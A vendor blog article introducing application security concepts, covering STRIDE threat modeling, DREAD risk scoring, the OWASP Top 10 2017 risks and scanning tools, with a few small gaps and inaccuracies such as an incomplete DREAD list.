Application Security Basics
Maintaining application security is critical. Any breach can compromise your customers’ sensitive information, damage your organization’s reputation, jeopardize regulatory compliance, and result in massive fines.
To help ensure your applications meet the level of security your organization requires, you need to understand the:
- Most sensitive information.
- Potential threats.
- Consequences of any breach.
- Steps you will take to mitigate any issue or breach as quickly as possible.
STRIDE Threat Modeling for Application Security
Threat modeling is the process for identifying and prioritizing potential threats to your application, from an attacker’s perspective. To complete this step, you will need to ask questions such as:
- What information in your organization would a hacker seek?
- What path or tools could a hacker use to gain access to your applications and data?
- How will you know if an attack is taking place — or is successful?
STRIDE threat modeling is a popular approach that stands for:
- Spoofing identity: Assuming a person's or site's identity.
- Tampering with data: Modifying information or code.
- Repudiation: Denying or contesting specific actions or transactions.
- Information disclosure: Exposing information to unauthorized sources.
- Denial of service: Causing your system to be totally unavailable to users.
- Elevation of privilege: Gaining elevated access to protected resources.
Risk Assessment Using the DREAD Framework
After categorizing all potential threats, it is important to assess all risks, based on:
- How likely it is that the threat will happen.
- The threat’s potential consequences.
- And whether the risk can be tolerated.
This exercise will determine which threats are the most urgent to address.
One of the most common mnemonic frameworks for risk assessment is DREAD, which stands for:
- Damage potential.
- Affected users.
When you use the DREAD framework, you rank each characteristic on a scale of 1-10 or 1-5, depending on your preference. Keep in mind that the scale is subjective and will differ from one organization to another. The five rankings are added up for a final score to determine severity.
In addition to using the STRIDE and DREAD frameworks to understand and assess your risks, it is also helpful to use guidelines from the Open Web Application Security Project Foundation (OWASP).
OWASP Top 10 2017
The Open Web Application Security Project Foundation, or OWASP, is a non-profit organization aimed at spreading awareness of software security across the globe. In 2017, OWASP shared the OWASP Top 10 list of the most common and critical security risks seen in web applications today. It is a good idea to review the list to ensure you are aware of potential threats and recommendations for prevent them.
Each threat is ranked for applications’ threat agents, exploitability, prevalence, detectability, technical impact, and business impact.
Injection flaws occur when hostile, untrusted data is sent to an interpreter as part of a command or query, tricking the interpreter into executing unintended commands or accessing data without proper authorization.
Often found in SQL, LDAP, and XPathqueries, injection is highly prevalent, exploitable, and detectable. You can detect these flaws by examining code, so be sure to regularly scan your code.
2. Broken Authentication
Broken authentication occurs when functions related to authentication and session management are implemented incorrectly, allowing attackers to compromise passwords or keys. Attackers can also exploit authentication and session-management errors to assume a user’s identity, temporarily or permanently.
The exploitability and technical impacts of broken authentication are high, with moderate prevalence and detectability. An easy way to help prevent broken authentication is by using multi-factor authentication and avoiding the use of vulnerable passwords.
3. Sensitive Data Exposure
Many web applications and APIs fail to properly protect sensitive data, including financial, healthcare, and other personal information. When proper security measures are not in place, attackers can access, steal, and modify data to conduct fraud, identity theft, or other crimes.
Encrypting data both at rest and in transit, and salting passwords, can help combat this risk.
4. External Entities
External entities (XXE) refer to the attackers actively seeking access to sensitive data. They look for vulnerabilities to exploit, including older or poorly-configured XML files that can be hacked to access internal ports and file shares — and enable remote code execution and denial-of-service attacks. Although the impact of any breach is significant, IT teams can detect the activities of external attackers using tools such as SAST and DAST, which inspect dependencies and configurations.
5. Broken Access Control
Broken access control means a failure to enforce restrictions on authenticated users, including what actions they are allowed to take and which systems and data they are allowed to access. Attackers take advantage of these flaws to access users’ accounts, view sensitive files, change access rights, and modify data. The impact of broken access control can range from moderate to severe, especially if an attacker gains administrative privileges and proceeds to access, create, update, and delete business records. Manual testing can help to detect broken access control.
6. Security Misconfiguration
Security misconfiguration includes insecure default configurations, incomplete or ad-hoc configurations, unprotected cloud storage, misconfigured HTTP headers, and verbose error messages containing sensitive information. Such errors can occur at any level of your application stack, including operating systems, frameworks, libraries, and applications. And these types of errors can compromise your entire system. Security misconfiguration is extremely prevalent, detectable, and exploitable. Search engines and automated scanners can pick up these misconfigurations.
7. Cross-Site Scripting
Also referred to as XSS, cross-site scripting flaws occur when an application includes untrusted data in a new web page without proper validation or escaping. When this happens, attackers can execute scripts in the victim’s browser, hijack a user session, deface a website, or redirect users to malicious sites. Many applications and web servers do a good job mitigating XSS, so these types of errors are less prevalent and highly detectable.
8. Insecure Deserialization
Insecure deserialization often leads to remote code execution, and can be used to perform replay attacks, injection attacks, and privilege escalation attacks. While it’s harder to exploit and isn’t as common as other types of security issues, insecure deserialization is also harder to detect — and the technical impact can be serious. Some tools have been developed to discover deserialization flaws, but human assistance is often needed for validation.
9. Using Components With Known Vulnerabilities
One of the biggest security issues today comes from people running components with known, unpatched vulnerabilities. Components — such as video players — have the same privileges as their applications. So running them when they have an open vulnerability opens your applications and APIs to attacks.
This is the most prevalent security issue because it is often difficult for IT teams to keep track of the internal frameworks and required updates for all systems across an organization. Prevention requires knowing what components are used across your organization and when they have updates, so you can install patches as soon as they are available.
10. Insufficient Monitoring and Logging
The average time it takes for a company to discover a data breach is over 200 days. That’s because many organizations lack effective monitoring and logging solutions that flag potential risks. In addition, many IT teams lack effective processes for investigating potential issues, which prolongs the time to detection. The longer a breach is left undiscovered, the more time hackers have to pivot to other systems — and tamper and destroy data.
This issue is highly prevalent, and the technical impact varies considerably. However, you can reduce time to detection by improving your monitoring and penetration testing to ensure your logs contain the right amount of detail to detect a breach.
Tools for Web App Security
To reduce the risk of security threats, you can also take the following steps:
- Use penetration testing platforms such as Metasploitable2 to understand how to detect and resolve issues.
- Deploy the free, open source security scanning application, Zed Attack Proxy, to crawl your site and system — and take advantage of its active, passive, and manual security-testing tools.
In addition, you can watch the Application Security Basics webinar facilitated by John Saboe, an open source software Enterprise Architect at OpenLogic by Perforce. In it, he reviews security risks and explains how to use the OWASP Top 10 threat model to improve your organization’s IT security.